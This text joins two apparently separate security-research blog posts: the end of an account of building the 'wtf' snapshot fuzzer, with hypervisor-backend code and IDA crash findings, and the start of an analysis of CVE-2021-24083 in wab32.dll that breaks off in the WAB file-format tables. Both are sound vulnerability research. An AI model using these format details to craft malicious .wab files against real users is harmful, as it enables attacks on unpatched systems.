ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though. Filling the address space with int3s and lazily populating code leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag, let's say a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv.

I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways.

I haven't run into this bug with the latest version of IDA yet which was nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once fixed, I noticed that WHvTranslateGva also was slower than I expected. This is why I also emulated its behavior by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure.

I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker that is a project creating micro vms to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project.

KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of the guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == nullptr) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}

On-demand paging

Implementing on demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and that services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When the hardware supports it, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit and I remember struggling to get the interruption fired. I am still not 100% sure that I got the details fully right but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support this VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be here and so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about 100$ / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case used generated executions of around 195 millions instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF possible. I built this corpus made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generate execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients are runners that send back results to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book

Exodus Intelligence

Exodus Intel VRT

5 August 2021 at 12:26

By Eneko Cruz Elejalde

Overview

This post analyzes a heap-buffer overflow in Microsoft Windows Address Book. Microsoft released an advisory for this vulnerability for the 2021 February patch Tuesday. This post will go into detail about what Microsoft Windows Address Book is, the vulnerability itself, and the steps to craft a proof-of-concept exploit that crashes the vulnerable application.

Windows Address Book

Windows Address Book is a part of the Microsoft Windows operating system and is a service that provides users with a centralized list of contacts that can be accessed and modified by both Microsoft and third party applications. The Windows Address Book maintains a local database and interface for finding and editing information about contacts, and can query network directory servers using Lightweight Directory Access Protocol (LDAP). The Windows Address Book was introduced in 1996 and was later replaced by Windows Contacts in Windows Vista and subsequently by the People App in Windows 10.

The Windows Address Book provides an API that enables other applications to directly use its database and user interface services to enable services to access and modify contact information. While Microsoft has replaced the application providing the Address Book functionality, newer replacements make use of old functionality and ensure backwards compatibility. The Windows Address Book functionality is present in several Windows Libraries that are used by Windows 10 applications, including Outlook and Windows Mail. In this way, modern applications make use of the Windows Address Book and can even import address books from older versions of Windows.

CVE-2021-24083

A heap-buffer overflow vulnerability exists within the SecurityCheckPropArrayBuffer() function within wab32.dll when processing nested properties of a contact. The network-based attack vector involves enticing a user to open a crafted .wab file containing a malicious composite property in a WAB record.

Vulnerability

The vulnerability analysis that follows is based on Windows Address Book Contacts DLL (wab32.dll) version 10.0.19041.388 running on Windows 10 x64.

The Windows Address Book Contacts DLL (i.e. wab32.dll) provides access to the Address Book API and it is used by multiple applications to interact with the Windows Address Book. The Contacts DLL handles operations related to contact and identity management. Among others, the Contacts DLL is able to import an address book (i.e, a WAB file) exported from an earlier version of the Windows Address Book.

Earlier versions of the Windows Address Book maintained a database of identities and contacts in the form of a .wab file. While current versions of Windows do not use a .wab file by default anymore, they allow importing a WAB file from an earlier installation of the Windows Address Book.

There are multiple ways of importing a WAB file into the Windows Address Book, but it was observed that applications rely on the Windows Contacts Import Tool (i.e, C:\Program Files\Windows Mail\wabmig.exe) to import an address book. The Import Tool loads wab32.dll to handle loading a WAB file, extracting relevant contacts, and importing them into the Windows Address Book.

WAB File Format

The WAB file format (commonly known as Windows Address Book or Outlook Address Book) is an undocumented and proprietary file format that contains personal identities. Identities may in turn contain contacts, and each contact might contain one or more properties.

Although the format is undocumented, the file-format has been partially reverse-engineered by a third party. The following structures were obtained from a combination of a publicly available third-party application and the disassembly of wab32.dll. Consequently, there may be inaccuracies in structure definitions, field names, and field types.

The WAB file has the following structure:

Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------
0x0         16                Magic Number            Sixteen magic bytes
0x10        4                 Count 1                 Unknown Integer
0x14        4                 Count 2                 Unknown Integer
0x18        16                Table Descriptor 1      Table descriptor
0x28        16                Table Descriptor 2      Table descriptor
0x38        16                Table Descriptor 3      Table descriptor
0x48        16                Table Descriptor 4      Table descriptor
0x58        16                Table Descriptor 5      Table descriptor
0x68        16                Table Descriptor 6      Table descriptor

All multi-byte fields are represented in little-endian byte order unless otherwise specified. All string fields are in Unicode, encoded in the UTF16-LE format.

The Magic Number field contains the following sixteen bytes: 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4. While some sources list the sequence of bytes 81 32 84 C1 85 05 D0 11 B2 90 00 AA 00 3C F6 76 as a valid magic number for a WAB file, it was found experimentally that replacing the sequence of bytes prevents the Windows Address Book from processing the file.

Each of the six Table Descriptor fields numbered 1 through 6 has the following structure:

Offset    Length    Field    Description
          (bytes)
-------   --------  -------  -------------------
0x0       4         Type     Type of table descriptor
0x4       4         Size     Size of the record described
0x8       4         Offset   Offset of the record described relative to the beginning of file
0xC       4         Count    Number of records present at offset

The following are examples of some known types of table descriptor:

Text Record (Type: 0x84d0): A record containing a Unicode string.
Index Record (Type: 0xFA0): A record that may contain several descriptors to WAB records.

Each text record has the following structure:

Offset   Length (bytes)    Field          Description
------   --------------    ------------   -------------------
0x0      N                 Content        Text content of the record; a null terminated UNICODE string
0x0+N    0x4               RecordId       A record identifier for the text record

Similarly, each index record has the following structure

Offset      Length (bytes)    Field        Description
---------   --------------    ----------   -------------------
0x0         4                 RecordId     A record identifier for the index record
0x4         4                 Offset       Offset of the record relative to the beginning of the file

Each entry in the index record (i.e, each index record structure in succession) has an offset that points to a WAB record.

WAB Records

A WAB record is used to describe a contact. It contains fields such as email addresses and phone numbers stored in properties, which may be of various types such as string, integer, GUID, and timestamp. Each WAB record has the following structure:

Offset      Length   Field              Description
---------   ------   ---------------    -------------------
0x0         4        Unknown1           Unknown field
0x4         4        Unknown2           Unknown field
0x8         4        RecordId           A record identifier for the WAB record
0xC         4        PropertyCount      The number of properties contained in RecordProperties
0x10        4        Unknown3           Unknown field 
0x14        4        Unknown4           Unknown field 
0x18        4        Unknown5           Unknown field 
0x1C        4        DataLen            The length of the RecordProperties field (M)
